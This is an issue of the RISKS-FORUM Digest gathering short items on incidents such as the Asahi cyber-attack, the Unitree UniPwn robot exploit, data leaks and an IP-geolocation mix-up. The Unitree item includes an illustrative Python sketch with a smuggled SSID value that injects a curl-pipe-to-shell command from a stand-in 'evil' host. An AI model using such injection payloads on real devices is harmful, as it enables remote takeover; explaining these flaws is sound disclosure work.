    ------------------------------

    Date: Thu, 9 Oct 2025 20:54:45 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Tech billionaires seem to be doom prepping. Should we all be
    worried? (BBC)

    https://www.bbc.com/news/articles/cly17834524o

    Mark Zuckerberg is said to have started work on Koolau Ranch, his
    sprawling 1,400-acre compound on the Hawaiian island of Kauai, as far
    back as 2014.

    It is set to include a shelter, complete with its own energy and food
    supplies, though the carpenters and electricians working on the site were
    banned from talking about it by non-disclosure agreements, according to a
    report by Wired magazine. A six-foot wall blocked the project from view
    of a nearby road.

    Asked last year if he was creating a doomsday bunker, the Facebook founder
    gave a flat "no". The underground space, spanning some 5,000 square feet,
    is, he explained, "just like a little shelter, it's like a basement".

    ------------------------------

    Date: Fri, 3 Oct 2025 06:36:32 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Japan faces Asahi beer shortage after cyber-attack (BBC)

    https://www.bbc.com/news/articles/c0r0y14ly5ro

    Japan is facing a shortage of Asahi products, including beer and bottled
    tea, as the drinks giant grapples with the impact of a major cyber-attack
    that has affected its operations in the country.

    Most of the Asahi Group's factories in Japan have been at a standstill
    since Monday, after the attack hit its ordering and delivering systems.

    Major Japanese retailers, including 7-Eleven and FamilyMart, have now
    warned customers to expect shortages of Asahi products.

    [A kiss is just a kiss, Asahi is just a sigh, as time goes by(e)...
    Casablanca. We'll always have Paris for wine -- and bière. PGN]

    ------------------------------

    Date: Sat, 4 Oct 2025 01:23:59 +0000
    From: Victor Miller <victorsmiller@gmail.com>
    Subject: New WireTap Attack Extracts Intel SGX ECDSA Key via DDR4 Memory-Bus
    Interposer (The Hacker News)

    https://thehackernews.com/2025/10/new-wiretap-attack-extracts-intel-sgx.html?m=1

    ------------------------------

    Date: Mon, 29 Sep 2025 11:22:12 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Exploit Allows for Takeover of Fleets of Unitree Robots
    (Evan Ackerman)

    Evan Ackerman, *IEEE Spectrum* (09/25/25), via ACM TechNews

    Security researchers disclosed a critical Bluetooth Low Energy vulnerability
    in several robots manufactured by Chinese robotics company Unitree that
    gives attackers full root access and enables worm-like self-propagation
    between nearby devices. The exploit, called UniPwn, affects Unitree's Go2
    and B2 quadrupeds as well as its G1 and H1 humanoids, and arises from
    hardcoded encryption keys and insufficient packet validation. Attackers
    can inject malicious code disguised as Wi-Fi credentials, leading to
    persistent compromise and potential botnet formation.
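
    A hypothetical sketch (Python, not Unitree's actual code) of one way the
    two reported flaws could combine: a "secret" key that ships identically
    in every unit, and a Wi-Fi SSID field that reaches a root shell without
    validation. The cipher, command, and values below are illustrative
    assumptions only.

      # Every attacker who owns (or downloads firmware for) one robot has this.
      HARDCODED_KEY = 0x42   # stand-in for the shared key baked into all devices

      def decrypt(packet: bytes) -> str:
          # Placeholder cipher: "decrypts correctly" proves nothing when the
          # key is public knowledge.
          return bytes(b ^ HARDCODED_KEY for b in packet).decode(errors="ignore")

      def provisioning_command(packet: bytes) -> str:
          ssid = decrypt(packet)   # no further payload checks
          # On a vulnerable device this string would reach a root shell.
          return f"nmcli dev wifi connect '{ssid}'"

      # An "SSID" that is really a command -- the worm's foothold:
      evil = bytes(b ^ HARDCODED_KEY for b in b"x'; curl http://evil/x.sh | sh #")
      print(provisioning_command(evil))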

    ------------------------------

    Date: Fri, 26 Sep 2025 11:32:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Google Says 90% of Tech Workers Are Now Using AI at Work
    (Lisa Eadicicco)

    Lisa Eadicicco, CNN (09/23/25), via ACM TechNews

    Of 5,000 global technology professionals surveyed by Google's DORA
    research division, the vast majority (90%) said they now use AI in their
    jobs, up 14 percentage points from 2024. However, the survey found only
    20% of respondents place "a lot" of trust in the quality of AI-generated
    code, compared to 23% who trust it "a little" and 46% who trust it
    "somewhat."

    ------------------------------

    Date: Sat, 27 Sep 2025 10:48:55 +0100
    From: Martin Ward <martin@gkc.org.uk>
    Subject: Neon buys phone calls to train AI, then leaks them all

    Neon Mobile is an app that sells your phone calls to AI companies for
    training, and pays you 15–30 cents per minute!

    Could there be a RISK of all this personal data leaking?

    One day after reporting on the new app, TechCrunch reported that Neon's
    publicly accessible web site listed "data about the most recent calls made
    by the app’s users, as well as providing public web links to their raw
    audio files and the transcript text."

    Pivot to AI report:
    https://www.youtube.com/watch?v=G_LKccOiCoo

    ------------------------------

    Date: Sat, 4 Oct 2025 07:23:13 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: Government ID data used for age verification stolen
    (This Week in Security)

    [Gee, as if nobody predicted stuff like this, huh?]

    https://this.weekinsecurity.com/discord-says-users-government-ids-used-for-age-checks-stolen-by-hackers/

    ------------------------------

    Date: Fri, 26 Sep 2025 15:23:40 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Federal cyber agency warns of 'serious and urgent' attack on
    tech used by remote workers (CBC)

    https://www.cbc.ca/news/politics/cisco-cyber-attack-vpn-1.7644591

    Government cyber-agencies around the world are rushing to clamp down on
    what appears to be an advanced and sophisticated espionage campaign
    targeting popular security software used by remote workers.

    Calling the threat "serious and urgent," Canada's Communications Security
    Establishment's (CSE) Centre for Cyber Security joined its international
    allies Thursday in urging organizations to take immediate action to patch
    vulnerabilities following a widespread hit on the technology security
    company Cisco.

    ------------------------------

    Date: Sat, 11 Oct 2025 12:44:20 -0400
    From: "Gabe Goldberg" <gabe@gabegold.com>
    Subject: Billions of Dollars ‘Vanished’: Low-Profile Bankruptcy Rings Alarms
    on Wall Street (The New York Times)

    The unraveling of First Brands, a midsize auto-parts maker, is exposing
    hidden losses at international banks and “private credit” lenders.

    Unlike traditional banks, private credit lenders say, they have the
    ability to lend quickly because they understand complicated, risky
    businesses and do not need to worry about repaying ordinary depositors
    or reporting public earnings.

    Trillions of dollars have been plowed into private credit over the past
    decade, principally from pension funds, endowments and other groups that
    rely on such investments to fulfill obligations to retirees and the like.

    The Trump administration made moves this summer to allow 401(k) plans to
    invest savings into the private equity funds that extend private credit
    to companies, raising the stakes even further.

    The First Brands bankruptcy could amount to something of an
    I-told-you-so moment for the traditional bankers and private-credit
    skeptics who have long maintained that these upstart lenders deserve
    more scrutiny.

    https://www.nytimes.com/2025/10/10/business/first-brands-bankruptcy-wall-street.html?smid=nytcore-ios-share&referringSource=articleShare

    ------------------------------

    Date: Thu, 25 Sep 2025 23:08:03 -0600
    From: "Matthew Kruk" <mkrukg@gmail.com>
    Subject: 911 Service Is Restored in Louisiana and Mississippi (NYTimes)

    https://www.nytimes.com/2025/09/25/us/mississippi-louisiana-outages-911-emergency.html

    Emergency call service was disrupted across Louisiana and Mississippi for
    more than two hours on Thursday afternoon, officials said, citing damage
    to fiber optic lines operated by AT&T.

    Gov. Tate Reeves of Mississippi said that the state’s Emergency Management
    Agency had received reports that AT&T was responding to “a series of fiber
    cuts,” which he said had interrupted service in Mississippi and Louisiana.

    Scott Simmons, a spokesman for the Mississippi Emergency Management
    Agency, said there were no indications of foul play, and that AT&T was
    investigating.

    ------------------------------

    Date: Thu, 2 Oct 2025 08:44:19 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: How an Internet mapping glitch turned a random Kansas farm into a
    digital hell (Fusion)

    EXCERPT:
    An hour’s drive from Wichita, Kansas, in a little town called Potwin,
    there is a 360-acre piece of land with a very big problem.

    The plot has been owned by the Vogelman family for more than a hundred
    years, though the current owner, Joyce Taylor née Vogelman, 82, now rents
    it out. The acreage is quiet and remote: a farm, a pasture, an old orchard,
    two barns, some hog shacks and a two-story house. It’s the kind of place
    you move to if you want to get away from it all. The nearest neighbor is a
    mile away, and the closest big town has just 13,000 people. It is real,
    rural America; in fact, it’s a two-hour drive from the exact geographical
    center of the United States.

    But instead of being a place of respite, the people who live on Joyce
    Taylor’s land find themselves in a technological horror story.

    For the last decade, Taylor and her renters have been visited by all kinds
    of mysterious trouble. They've been accused of being identity thieves,
    spammers, scammers and fraudsters. They've gotten visited by FBI agents,
    federal marshals, IRS collectors, ambulances searching for suicidal
    veterans, and police officers searching for runaway children. They've
    found people scrounging around in their barn. The renters have been
    doxxed, their names and addresses posted on the Internet by vigilantes.
    Once, someone left a broken toilet in the driveway as a strange,
    indefinite threat.

    All in all, the residents of the Taylor property have been treated like
    criminals for a decade. And until I called them this week, they had no
    idea why.

    To understand what happened to the Taylor farm, you have to know a little
    bit about how digital cartography works in the modern era -- in
    particular, a form of location service known as “IP mapping.” [...]
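
    A hypothetical sketch of the failure mode the excerpt is pointing at (not
    any vendor's real code or data): when a geolocation database knows only
    "somewhere in the U.S.", it still has to return coordinates, and a
    centroid-style default near the middle of the country gets treated
    downstream as if it were a street address. The IPs and coordinates below
    are illustrative.

      US_DEFAULT = (38.0, -97.0)   # country-level placeholder, near Potwin, KS

      def locate(ip: str, db: dict[str, tuple[float, float]]) -> tuple[float, float]:
          # Return a precise entry if we have one; otherwise the country default.
          return db.get(ip, US_DEFAULT)

      db = {"203.0.113.7": (37.6872, -97.3301)}   # one IP we actually know (Wichita)
      print(locate("203.0.113.7", db))            # real record
      print(locate("198.51.100.23", db))          # unknown IP -> "the Taylor farm"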

    https://archive.ph/zHha3

    ------------------------------

    Date: Fri, 26 Sep 2025 13:04:28 +0300
    From: Amos Shapir <amos083@gmail.com>
    Subject: Microsoft cuts off cloud services to Israeli military unit (NBC)

    I don't know which is more unsettling: that a private company takes
    action against a sovereign nation's military at war -- or that a nation
    at war keeps some of its top secrets on a cloud managed by a foreign
    private company.

    ------------------------------

    Date: Fri, 26 Sep 2025 10:42:17 +0100
    From: Martin Ward <martin@gkc.org.uk>
    Subject: ShareFile website

    I recently had to set up an account on ShareFile.

    (1) I used the Firefox feature to generate a strong password. The website
    said there was a "bad character" in the generated password. It wouldn't
    say *which* character, so I had to go through taking out characters one
    at a time until it was happy. It turned out to be "<". Presumably, this
    character triggered a bug in their software somewhere. Rather than fix
    the bug, they added a check to prevent this character from appearing in
    passwords.

    (2) I pasted in my phone number and it complained that spaces are not
    allowed in phone numbers. The computer code to strip spaces from a phone
    number is not particularly difficult or complex to write: they had
    already implemented the code to check for spaces. But I had to manually
    strip the spaces from the number myself. (A sketch of how little work
    this is follows below.)
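
    A minimal sketch (Python, not ShareFile's actual code) of the
    normalization they could have done instead; the accepted separators and
    the length bounds are my own assumptions:

      import re

      def normalize_phone(raw: str) -> str:
          """Strip spaces and common separators, keeping digits and a leading '+'."""
          cleaned = re.sub(r"[ \-().]", "", raw.strip())
          if not re.fullmatch(r"\+?\d{6,15}", cleaned):
              raise ValueError(f"does not look like a phone number: {raw!r}")
          return cleaned

      print(normalize_phone("+44 1234 567 890"))   # -> +441234567890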

    These are irritants rather than security hazards; but given that the
    quality of the customer-facing interface software is so poor, it does not
    inspire much confidence in the security of their file sharing software
    generally.

    At least the file I was sharing was encrypted before uploading to the
    ShareFile site!

    ------------------------------

    Date: Sat, 28 Oct 2023 11:11:11 -0800
    From: RISKS-request@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) has moved to the ftp.sri.com site:
    <risksinfo.html>.
    *** Contributors are assumed to have read the full info file for guidelines!

    OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    delightfully searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume/previous directories
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-34.00
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks may have done to URLs.
    Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 34.77
    ************************



  • From RISKS List Owner@risko@csl.sri.com to risks-resend@csl.sri.com on Thu Oct 16 17:00:45 2025